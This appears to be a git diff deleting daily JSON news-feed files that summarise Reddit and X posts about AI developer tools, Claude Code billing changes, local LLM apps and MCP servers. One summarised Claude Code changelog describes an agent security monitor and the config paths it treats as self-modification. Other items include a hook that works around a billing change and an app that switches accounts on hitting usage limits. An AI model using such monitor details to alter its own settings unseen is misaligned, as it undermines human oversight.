"https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-12T20:21:51.000Z", - "summary": "[Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\\_flux\\_character\\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they…", - "category": "creative_tools" - }, - { - "title": "Vulkan or CPU llama cpp backend for local llm for coding/code assist", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T19:00:39.000Z", - "summary": "Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-13.json b/data/news-feed-2026-05-13.json deleted file mode 100644 index dae933f..0000000 --- a/data/news-feed-2026-05-13.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.782Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-13", - "article_count": 15, - "archived_story_count": 656, - "articles": [ - { - "title": "I'm cooked. Anthropic just split \"--print\" mode to $/mo credits", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T22:16:44.000Z", - "summary": "So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \\[tickets + agents + hooks + executors -> \"claude -p\" -> hands-free always-on productivity\\]. Now that Anthropic has announced that \"claude --print\" will, from June 15 forward, be considered \"programmatic\" SDK usage, all jobs launched using \"--print\" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below!", - "category": "ai_tools" - }, - { - "title": "TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T13:00:32.000Z", - "summary": "Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat…", - "category": "ai_models" - }, - { - "title": "Cross devices agent memory and context management?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T09:49:46.000Z", - "summary": "Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type \"codex\" or \"claude\". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest \"CHANGELOG\" markdown file, or maybe even \"HANDOFF.md\" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/worklow?", - "category": "ai_tools" - }, - { - "title": "The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T08:31:25.000Z", - "summary": "Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \\~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't \"generate me a landing page.\" It's sustained autonomous development where the model maintains context across sessions, manages…", - "category": "ai_models" - }, - { - "title": "Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-13T01:39:12.000Z", - "summary": "* NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops \"in your system prompt\" from the \"default to forking\" reference so the rule applies generically to parent guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa…", - "category": "ai_tools" - }, - { - "title": "Context Is Not Control, a source-boundary eval for LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-13T20:03:41.000Z", - "summary": "I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \\* evidence \\* user framing \\* quoted material \\* source text \\* instruction-like contamination \\* unsupported claims \\* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that…", - "category": "ai_models" - }, - { - "title": "What kinds of models are people training with document data? [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T18:52:46.000Z", - "summary": "We've helped some folks with synthetic data for a number of different projects and some of them for \"document data\". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-)", - "category": "ai_research" - }, - { - "title": "A new monthly Agent SDK credit for Claude plans", - "url": "https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T17:30:36.000Z", - "summary": "Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr…", - "category": "ai_tools" - }, - { - "title": "Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-05-13T10:24:41.000Z", - "summary": "Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html)", - "category": "ai_tools" - }, - { - "title": "A fully autonomous browser runtime for any AI agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T10:09:06.000Z", - "summary": "Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. Please take a look and let me know:", - "category": "ai_tools" - }, - { - "title": "I built a native macOS app to manage Claude Code sessions, accounts, and projects", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T08:42:52.000Z", - "summary": "I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features!", - "category": "ai_tools" - }, - { - "title": "Fast mode for Claude Opus 4.7 is now available on the api.", - "url": "https://x.com/DailyXplorer/status/2054464151234228372", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-13T07:29:58.000Z", - "summary": "Fast mode for Claude Opus 4.7 is now available on the api.", - "category": "ai_models" - }, - { - "title": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…", - "url": "https://x.com/jiaweihq/status/2054463419722707134", - "source": "X search / Agent workflows", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T07:27:04.000Z", - "summary": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth", - "category": "ai_agents" - }, - { - "title": "Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-13T03:56:36.000Z", - "summary": "Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of \"AI did the work for me\". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. If you've benchmarked Qwen3 tool-calling fail…", - "category": "ai_models" - }, - { - "title": "I built a local GUI + AI builder for creating ComfyUI custom node packs", - "url": "https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T00:48:52.000Z", - "summary": "I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next?", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-14.json b/data/news-feed-2026-05-14.json deleted file mode 100644 index ce170a1..0000000 --- a/data/news-feed-2026-05-14.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.946Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-14", - "article_count": 15, - "archived_story_count": 592, - "articles": [ - { - "title": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", - "url": "https://x.com/OpenAIDevs/status/2051725072873001338", - "source": "X / @openaidevs", - "tags": [ - "api_update", - "product_launch", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T18:05:51.000Z", - "summary": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", - "category": "ai_tools" - }, - { - "title": "Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T06:13:22.000Z", - "summary": "Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions!", - "category": "ai_models" - }, - { - "title": "Simpler self hosted alt to Open WebUI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T01:05:45.000Z", - "summary": "Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that \"just works\". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome!", - "category": "ai_models" - }, - { - "title": "My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T00:42:20.000Z", - "summary": "**Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \\o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. **What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work…", - "category": "ai_tools" - }, - { - "title": "[N] LangChain Interrupt 2026 announcements [N]", - "url": "https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T17:20:27.000Z", - "summary": "LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. **Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t…", - "category": "ai_research" - }, - { - "title": "A VERY lightweight open web-search tool for smaller local LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-14T14:32:02.000Z", - "summary": "Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo…", - "category": "ai_models" - }, - { - "title": "Stable Diffusion WebUI Forge for AMD GPU", - "url": "https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T13:55:36.000Z", - "summary": "It was a f\\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. \"Proof pics\" \"[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)\" *The link should look like this* [\\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files \"down bellow in the picture\" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\\\\"\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\\\\" in case u are copying i…", - "category": "creative_tools" - }, - { - "title": "Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T11:43:58.000Z", - "summary": "I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *\"Just use Sonnet for the cheap parts.\"* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured…", - "category": "ai_tools" - }, - { - "title": "Automated AI researcher running locally with llama.cpp", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T10:32:04.000Z", - "summary": "Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include.", - "category": "ai_models" - }, - { - "title": "OpenAI's deployment company move says more about the AI gap than any benchmark[D]", - "url": 